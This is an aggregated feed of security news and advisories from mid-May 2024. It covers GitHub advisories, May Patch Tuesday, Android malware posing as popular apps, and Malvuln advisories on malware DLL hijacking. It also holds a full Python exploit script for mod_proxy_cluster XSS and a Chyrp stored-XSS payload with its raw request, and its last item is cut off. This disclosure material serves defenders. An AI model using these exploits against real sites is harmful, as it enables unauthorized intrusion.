An issue in Reportico Web before v.8.1.0. This vulnerability arises from the failure of the web application to properly invalidate session cookies upon logout. When a user logs out of the application, the session cookie should be invalidated to prevent unauthorized access. However, due to the oversight in the application's implementation, the session cookie remains active even after logout. Consequently, if an attacker obtains the session cookie, they can exploit it to access the user's session and perform unauthorized actions.

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2024-31556

**Reportico Web fails to invalidate cookies upon logout**

Moderate severity GitHub Reviewed Published May 14, 2024 to the GitHub Advisory Database • Updated May 14, 2024

**Package**

composer reportico-web/reportico (Composer)

**Affected versions**

<= 8.1.0

An issue in Reportico Web before v.8.1.0. This vulnerability arises from the failure of the web application to properly invalidate session cookies upon logout. When a user logs out of the application, the session cookie should be invalidated to prevent unauthorized access. However, due to the oversight in the application's implementation, the session cookie remains active even after logout. Consequently, if an attacker obtains the session cookie, they can exploit it to access the user's session and perform unauthorized actions.

**References**

*   https://nvd.nist.gov/vuln/detail/CVE-2024-31556
*   reportico-web/reportico#53

Published to the GitHub Advisory Database

May 14, 2024

Last updated

May 14, 2024

GHSA-2q2f-h83x-cx3x: Reportico Web fails to invalidate cookies upon logout

Microsoft today released updates to fix more than 60 security holes in Windows computers and supported software, including two "zero-day" vulnerabilities in Windows that are already being exploited in active attacks. There are also important security patches available for macOS and Adobe users, and for the Chrome Web browser, which just patched its own zero-day flaw.

**Microsoft** today released updates to fix more than 60 security holes in **Windows** computers and supported software, including two “zero-day” vulnerabilities in Windows that are already being exploited in active attacks. There are also important security patches available for **macOS** and **Adobe** users, and for the **Chrome** Web browser, which just patched its own zero-day flaw.

First, the zero-days. CVE-2024-30051 is an “elevation of privilege” bug in a core Windows library. **Satnam Narang** at **Tenable** said this flaw is being used as part of post-compromise activity to elevate privileges as a local attacker.

“CVE-2024-30051 is used to gain initial access into a target environment and requires the use of social engineering tactics via email, social media or instant messaging to convince a target to open a specially crafted document file,” Narang said. “Once exploited, the attacker can bypass OLE mitigations in Microsoft 365 and Microsoft Office, which are security features designed to protect end users from malicious files.”

**Kaspersky Lab**, one of two companies credited with reporting exploitation of CVE-2024-30051 to Microsoft, has published a fascinating writeup on how they discovered the exploit in a file shared with Virustotal.com.

Kaspersky said it has since seen the exploit used together with QakBot and other malware. Emerging in 2007 as a banking trojan, QakBot (a.k.a. **Qbot** and **Pinkslipbot**) has morphed into an advanced malware strain now used by multiple cybercriminal groups to prepare newly compromised networks for ransomware infestations.

CVE-2024-30040 is a security feature bypass in **MSHTML**, a component that is deeply tied to the default Web browser on Windows systems. Microsoft’s advisory on this flaw is fairly sparse, but **Kevin Breen** from **Immersive Labs** said this vulnerability also affects **Office 365** and **Microsoft Office** applications.

“Very little information is provided and the short description is painfully obtuse,” Breen said of Microsoft’s advisory on CVE-2024-30040.

The only vulnerability fixed this month that earned Microsoft’s most-dire “critical” rating is CVE-2024-30044, a flaw in **Sharepoint** that Microsoft said is likely to be exploited. Tenable’s Narang notes that exploitation of this bug requires an attacker to be authenticated to a vulnerable SharePoint Server with Site Owner permissions (or higher) first and to take additional steps in order to exploit this flaw, which makes this flaw less likely to be widely exploited as most attackers follow the path of least resistance.

Five days ago, Google released a security update for Chrome that fixes a zero-day in the popular browser. Chrome usually auto-downloads any available updates, but it still may require a complete restart of the browser to install them. If you use Chrome and see a “Relaunch to update” message in the upper right corner of the browser, it’s time to restart.

Apple has just shipped macOS Sonoma 14.5 update, which includes nearly two dozen security patches. To ensure your Mac is up-to-date, go to System Settings, General tab, then Software Update and follow any prompts.

Finally, Adobe has critical security patches available for a range of products, including **Acrobat, Reader**, **Illustrator**, **Adobe Substance 3D Painter**, **Adobe Aero**, **Adobe Animate** and **Adobe Framemaker**.

Regardless of whether you use a Mac or Windows system (or something else), it’s always a good idea to backup your data and or system before applying any security updates. For a closer look at the individual fixes released by Microsoft today, check out the complete list over at the SANS Internet Storm Center. Anyone in charge of maintaining Windows systems in an enterprise environment should keep an eye on askwoody.com, which usually has the scoop on any wonky Windows patches.

Update, May 15, 8:28 a.m.: Corrected misattribution of CVE-2024-30051.

Patch Tuesday, May 2024 Edition

### Impact
Since PrestaShop 8.1.5, any invoice can be downloaded from front-office in anonymous mode, by supplying a random secure_key parameter in the url.

### Patches
Patched in 8.1.6

### Workarounds
Upgrade to 8.1.6

Thank you to Samuel Bodevin, who found this vulnerability and shared it with the PrestaShop team.


Skip to content

**Navigation Menu**

Sign in

**CVE-2024-34717**

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    
    Explore
    
    *   All features
    *   Documentation
    *   GitHub Skills
    *   Blog
    
*   For
    
    *   Enterprise
    *   Teams
    *   Startups
    *   Education
    
    By Solution
    
    *   CI/CD & Automation
    *   DevOps
    *   DevSecOps
    
    Resources
    
    *   Learning Pathways
    *   White papers, Ebooks, Webinars
    *   Customer Stories
    *   Partners
    
*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
    Repositories
    
    *   Topics
    *   Trending
    *   Collections
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

We read every piece of feedback, and take your input very seriously.

Include my email address so I can be contacted

**Saved searches****Use saved searches to filter your results more quickly**

Sign in

Sign up

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2024-34717

**Anonymous PrestaShop customer can download other customers' invoices**

Moderate severity GitHub Reviewed Published May 14, 2024 in PrestaShop/PrestaShop

Vulnerability details Dependabot alerts 0

**Package**

composer prestashop/prestashop (Composer)

**Affected versions**

\= 8.1.5

**Patched versions**

8.1.6

**Description**

**Impact**

Since PrestaShop 8.1.5, any invoice can be downloaded from front-office in anonymous mode, by supplying a random secure\_key parameter in the url.

**Patches**

Patched in 8.1.6

**Workarounds**

Upgrade to 8.1.6

Thank you to Samuel Bodevin, who found this vulnerability and shared it with the PrestaShop team.

**References**

*   GHSA-7pjr-2rgh-fc5g
*   https://nvd.nist.gov/vuln/detail/CVE-2024-34717
*   PrestaShop/PrestaShop@46b9a2b
*   https://github.com/PrestaShop/PrestaShop/releases/tag/8.1.6

 matthieu-rolland published to PrestaShop/PrestaShop

May 14, 2024

Published by the National Vulnerability Database

May 14, 2024

Published to the GitHub Advisory Database

May 14, 2024

Reviewed

May 14, 2024

**Severity**

Moderate

5.3

/ 10

**CVSS base metrics**

Attack vector

Network

Attack complexity

Low

Privileges required

None

User interaction

None

Scope

Unchanged

Confidentiality

Low

Integrity

None

Availability

None

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

**Weaknesses**

CWE-200

**CVE ID**

CVE-2024-34717

**GHSA ID**

GHSA-7pjr-2rgh-fc5g

**Source code**

PrestaShop/PrestaShop

**Credits**

*    matthieu-rolland Remediation developer

Checking history

See something to contribute? Suggest improvements for this vulnerability.

GHSA-7pjr-2rgh-fc5g: Anonymous PrestaShop customer can download other customers' invoices

The lone critical security issue is CVE-2024-30044, a remote code execution vulnerability in SharePoint Server.

Tuesday, May 14, 2024 13:57

After a relatively hefty Microsoft Patch Tuesday in April, this month’s security update from the company only included one critical vulnerability across its massive suite of products and services.  

In all, May’s slate of vulnerabilities disclosed by Microsoft included 59 total CVEs, most of which are considered to be of “important” severity. There is only one moderate-severity vulnerability. 

The lone critical security issue is CVE-2024-30044, a remote code execution vulnerability in SharePoint Server. An authenticated attacker who obtains Site Owner permissions or higher could exploit this vulnerability by uploading a specially crafted file to the targeted SharePoint Server. Then, they must craft specialized API requests to trigger the deserialization of that file’s parameters, potentially leading to remote code execution in the context of the SharePoint Server. 

The Windows Mobile Broadband Driver also contains multiple remote code execution vulnerabilities: 

*   CVE-2024-29997 
*   CVE-2024-29998 
*   CVE-2024-29999 
*   CVE-2024-30000 
*   CVE-2024-30001 
*   CVE-2024-30002 
*   CVE-2024-30003 
*   CVE-2024-30004 
*   CVE-2024-30005 

However, to successfully exploit this issue, an adversary would need to physically connect a compromised USB device to the victim's machine. 

Microsoft also disclosed a zero-day vulnerability in the Windows DWM Core Library, CVE-2024-30051. Desktop Window Manager (DWM) is a Windows operating system service that enables visual effects on the desktop and manages things like transitions between windows.   

An adversary could exploit CVE-2024-30051 to gain SYSTEM-level privileges.  

This vulnerability is classified as having a “low” level of attack complexity, and exploitation of this vulnerability has already been detected in the wild.  

One other issue, CVE-2024-30046, has already been disclosed prior to Patch Tuesday, but has not yet been exploited in the wild. This is a denial-of-service vulnerability in ASP.NET, a web application framework commonly used in Windows.  

Microsoft considers this vulnerability “less likely” to be exploited, as successful exploitation would require an adversary to spend a significant amount of time repeating exploitation attempts by sending constant or intermittent data to the targeted machine.   

A complete list of all the other vulnerabilities Microsoft disclosed this month is available on its update page. 

In response to these vulnerability disclosures, Talos is releasing a new Snort rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Cisco Security Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.  

The rules included in this release that protect against the exploitation of many of these vulnerabilities are 63419, 63420, 63422 - 63432, 63444 and 63445. There are also Snort 3 rules 300906 - 300912.

Only one critical vulnerability included in May’s Microsoft Patch Tuesday; One other zero-day in DWN Core

By Deeba Ahmed
Android Security Alert- Hackers are disguising malware as popular apps like Instagram and Snapchat to steal your login details. Learn how to identify fake apps and protect yourself from this sneaky cyberattack.
This is a post from HackRead.com Read the original post: Android Malware Poses as WhatsApp, Instagram, Snapchat to Steal Data

Imagine opening your favorite social media app, only to unknowingly hand over your login details to a sneaky hacker. That’s what is happening with Android users targeted by a malicious new malware campaign.

The SonicWall Capture Labs threat research team reports that threat actors are using malicious Android apps to impersonate popular online services like Google, Instagram, Snapchat, WhatsApp, and X. These apps aim to steal sensitive data from vulnerable Android phones, including contacts, text messages, call logs, and passwords.

These apps look legitimate due to using familiar logos and names to trick unsuspecting users and hide in plain sight. When opened, the app requests access to two permissions: Android Accessibility Service and Device Admin Permission. If the victim grants these permissions, the app can gain full control of the device.

“By requesting these permissions, the malicious app aims to gain control over the victim’s device, potentially allowing it to carry out harmful actions or steal sensitive information without the user’s awareness or consent,” SonicWall’s blog post read.

The malicious app then establishes a connection with a hacker-controlled C2 server, receiving additional instructions. It can read messages, call logs, access notification data, send messages, install malware, and open malicious websites for phishing purposes. 

Moreover, the app redirects victims to fake login pages of popular services like Facebook, GitHub, Instagram, Netflix, PayPal, LinkedIn, Microsoft, X, WordPress, and Yahoo, etc., prompting them to enter their username and password.

This information is shared with hackers, who can steal accounts, commit fraud, or even identity theft if sensitive personal information, including driver’s license or Social Security number, is stored on services like OneDrive.

Researchers are, however, unsure about how these apps end up on the best Android phones, but they suspect they are distributed through phishing sites, emails, text messages, or bundled with pirated software.

Fake Instagram app (left) – Fake Instagram and PayPal login page (Screengrabs: SonicWall Capture Labs)

This development follows security firms Symantec and Cyfirma’s recent warning of a social engineering campaign using WhatsApp to spread a new Android malware, posing as a defence-related application. 

To avoid falling victim to deceptive malware, stay vigilant and download apps from the official Google Play Store, ensuring they are legitimate and not from third-party stores or suspicious websites. Be wary of apps requesting excessive permissions, especially those unrelated to the app’s core function.

1.  New iOS Trojan “GoldPickaxe” Steals Facial Recognition Data
2.  Fake Skype, Zoom Apps Infecting Devices with Multiple RATs
3.  Fake Chrome Updates Spread Android Brokewell Banking Malware
4.  SpyNote Android Spyware Poses as Legit Crypto Wallets, Steals Funds
5.  Android Banking Malware FjordPhantom Steals Funds Via Virtualization

Android Malware Poses as WhatsApp, Instagram, Snapchat to Steal Data

TrojanSpy.Win64.EMOTET.A malware suffers from a code execution vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/f917c77f60c3c1ac6dbbadbf366ddd30.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: TrojanSpy.Win64.EMOTET.A Vulnerability: Arbitrary Code ExecutionDescription: The malware looks for and executes a x64-bit "CRYPTBASE.dll" PE file in its current directory. Therefore, we can hijack the DLL and execute our own code to intercept and terminate the malware. Once loaded the exploit dll will check if the current directory is "C:\Windows\System32", if not we grab our process ID and terminate. Leverage RansomLord v3 for DLL generation, while written as a proof-of-concept to specifically defeat ransomware, it can also be used to generate DLLs to try an exploit other types of malwares. All basic tests were conducted successfully in a virtual machine environment.Family: EMOTETType: PE64MD5: f917c77f60c3c1ac6dbbadbf366ddd30SHA256: b76fbc81bbb7f3108d27d9da9e2646aeb3769fba62bf7961f79306812de3486cVuln ID: MVID-2024-0684Disclosure: 05/14/2024Exploit/PoC:1) Download RansomLord v3    https://github.com/malvuln/RansomLord2) Locate the x64 CRYPTBASE.dll entry using the -m flag (DLL Map)3) Use -g flag (Generate Exploit) to output an x64 DLL CRYPTBASE.dll, based on an existing vulnerable malware in the victims list.4) (Optional) -e flag to setup Windows event IOC logging in the registry, this will log the SHA256 hash, full path and filename.Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

TrojanSpy.Win64.EMOTET.A MVID-2024-0684 Code Execution

Backdoor.Win32.AsyncRat malware suffers from a code execution vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/2337b9a12ecf50b94fc95e6ac34b3ecc.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.AsyncRatVulnerability: Arbitrary Code ExecutionDescription: The malware looks for and executes a x32-bit "CRYPTSP.dll" PE file in its current directory. Therefore, we can hijack the DLL and execute our own code to intercept and terminate the malware. Once loaded the exploit dll will check if the current directory is "C:\Windows\System32", if not we grab our process ID and terminate. Leverage RansomLord v3 for DLL generation, while written as a proof-of-concept to specifically defeat ransomware, it can also be used to generate DLLs to try an exploit other types of malwares. All basic tests were conducted successfully in a virtual machine environment.Family: AsyncRatType: PE32MD5: 2337b9a12ecf50b94fc95e6ac34b3eccSHA256: 3c703ecb3e8c54e352ff39fadbe789bb2313f848bd69551b07bf2ed0a58744b9Vuln ID: MVID-2024-0683Disclosure: 05/14/2024Exploit/PoC:1) Download RansomLord v3    https://github.com/malvuln/RansomLord2) Locate the x32 CRYPTSP.dll entry using the -m flag (DLL Map)3) Use -g flag (Generate Exploit) to output an x32 DLL CRYPTSP.dll, based on an existing vulnerable malware in the victims list.4) (Optional) -e flag to setup Windows event IOC logging in the registry, this will log the SHA256 hash, full path and filename.Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.AsyncRat MVID-2024-0683 Code Execution

Apache mod_proxy_cluster suffers from a cross site scripting vulnerability.

    import requestsimport argparsefrom bs4 import BeautifulSoupfrom urllib.parse import urlparse, parse_qs, urlencode, urlunparsefrom requests.exceptions import RequestExceptionclass Colors:    RED = '\033[91m'    GREEN = '\033[1;49;92m'    RESET = '\033[0m'def get_cluster_manager_url(base_url, path):    print(Colors.GREEN + f"Preparing the groundwork for the exploitation on {base_url}..." + Colors.RESET)    try:        response = requests.get(base_url + path)        response.raise_for_status()    except requests.exceptions.RequestException as e:        print(Colors.RED + f"Error: {e}" + Colors.RESET)        return None    print(Colors.GREEN + f"Starting exploit check on {base_url}..." + Colors.RESET)    if response.status_code == 200:        print(Colors.GREEN + f"Check executed successfully on {base_url}..." + Colors.RESET)        # Use BeautifulSoup to parse the HTML content        soup = BeautifulSoup(response.text, 'html.parser')        # Find all 'a' tags with 'href' attribute        all_links = soup.find_all('a', href=True)        # Search for the link containing the Alias parameter in the href attribute        cluster_manager_url = None        for link in all_links:            parsed_url = urlparse(link['href'])            query_params = parse_qs(parsed_url.query)            alias_value = query_params.get('Alias', [None])[0]            if alias_value:                print(Colors.GREEN + f"Alias value found" + Colors.RESET)                cluster_manager_url = link['href']                break        if cluster_manager_url:            print(Colors.GREEN + f"Preparing the injection on {base_url}..." + Colors.RESET)            return cluster_manager_url        else:            print(Colors.RED + f"Error: Alias value not found on {base_url}..." + Colors.RESET)            return None    print(Colors.RED + f"Error: Unable to get the initial step on {base_url}")    return Nonedef update_alias_value(url):    parsed_url = urlparse(url)    query_params = parse_qs(parsed_url.query, keep_blank_values=True)    query_params['Alias'] = ["<DedSec-47>"]    updated_url = urlunparse(parsed_url._replace(query=urlencode(query_params, doseq=True)))    print(Colors.GREEN + f"Injection executed successfully on {updated_url}" + Colors.RESET)    return updated_urldef check_response_for_value(url, check_value):    response = requests.get(url)    if check_value in response.text:        print(Colors.RED + "Website is vulnerable POC by :")        print(Colors.GREEN + """          ____           _ ____                  _  _ _____          |  _ \  ___  __| / ___|  ___  ___      | || |___  |         | | | |/ _ \/ _` \___ \ / _ \/ __| ____| || |  / /          | |_| |  __/ (_| |___) |  __/ (_  |____|__  | / /           |____/ \___|\__,_|____/ \___|\___|        |_|/_/                                        github.com/DedSec-47    """)    else:        print(Colors.GREEN + "Website is not vulnerable POC by :")        print(Colors.GREEN + """          ____           _ ____                  _  _ _____          |  _ \  ___  __| / ___|  ___  ___      | || |___  |         | | | |/ _ \/ _` \___ \ / _ \/ __| ____| || |  / /          | |_| |  __/ (_| |___) |  __/ (_  |____|__  | / /           |____/ \___|\__,_|____/ \___|\___|        |_|/_/                                        github.com/DedSec-47    """)def main():    # Create a command-line argument parser    parser = argparse.ArgumentParser(description="python CVE-2023-6710.py -t https://example.com -u /cluster-manager")    # Add a command-line argument for the target (-t/--target)    parser.add_argument('-t', '--target', help='Target domain (e.g., https://example.com)', required=True)    # Add a command-line argument for the URL path (-u/--url)    parser.add_argument('-u', '--url', help='URL path (e.g., /cluster-manager)', required=True)    # Parse the command-line arguments    args = parser.parse_args()    # Get the cluster manager URL from the specified website    cluster_manager_url = get_cluster_manager_url(args.target, args.url)    # Check if the cluster manager URL is found    if cluster_manager_url:        # Modify the URL by adding the cluster manager value        modified_url = args.target + cluster_manager_url        modified_url = update_alias_value(args.target + cluster_manager_url)        print(Colors.GREEN + "Check executed successfully" + Colors.RESET)        # Check the response for the value "<DedSec-47>"        check_response_for_value(modified_url, "<DedSec-47>")if __name__ == "__main__":    main()

Apache mod_proxy_cluster Cross Site Scripting

Chryp version 2.5.2 suffers from a persistent cross site scripting vulnerability.

    # Chyrp 2.5.2 - Stored Cross-Site Scripting (XSS)# Date: 2024-04-24# Exploit Author: Ahmet Ümit BAYRAM# Vendor Homepage: https://github.com/chyrp/# Software Link: https://github.com/chyrp/chyrp/archive/refs/tags/v2.5.2.zip# Version: 2.5.2# Tested on: MacOS### Steps to Reproduce ###- Login from the address: http://localhost/chyrp/?action=login.- Click on 'Write'.- Type this payload into the 'Title' field: "><img src=x onerror=alert("Stored")>- Fill in the 'Body' area and click 'Publish'.- An alert message saying "Stored" will appear in front of you.### PoC Request ###POST /chyrp/admin/?action=add_post HTTP/1.1Host: localhostCookie: ChyrpSession=c4194c16a28dec03e449171087981d11;show_more_options=trueUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0)Gecko/20100101 Firefox/124.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflate, brContent-Type: multipart/form-data;boundary=---------------------------28307567523233313132815561598Content-Length: 1194Origin: http://localhostReferer: http://localhost/chyrp/admin/?action=write_postUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailersConnection: close-----------------------------28307567523233313132815561598Content-Disposition: form-data; name="title""><img src=x onerror=alert("Stored")>-----------------------------28307567523233313132815561598Content-Disposition: form-data; name="body"<p>1337</p>-----------------------------28307567523233313132815561598Content-Disposition: form-data; name="status"public-----------------------------28307567523233313132815561598Content-Disposition: form-data; name="slug"-----------------------------28307567523233313132815561598Content-Disposition: form-data; name="created_at"04/24/24 12:31:57-----------------------------28307567523233313132815561598Content-Disposition: form-data; name="original_time"04/24/24 12:31:57-----------------------------28307567523233313132815561598Content-Disposition: form-data; name="trackbacks"-----------------------------28307567523233313132815561598Content-Disposition: form-data; name="feather"text-----------------------------28307567523233313132815561598Content-Disposition: form-data; name="hash"11e11aba15114f918ec1c2e6b8f8ddcf-----------------------------28307567523233313132815561598--

Chyrp 2.5.2 Cross Site Scripting

Google on Monday shipped emergency fixes to address a new zero-day flaw in the Chrome web browser that has come under active exploitation in the wild.
The high-severity vulnerability, tracked as CVE-2024-4761, is an out-of-bounds write bug impacting the V8 JavaScript and WebAssembly engine. It was reported anonymously on May 9, 2024.
Out-of-bounds write bugs could be typically

Tag

#web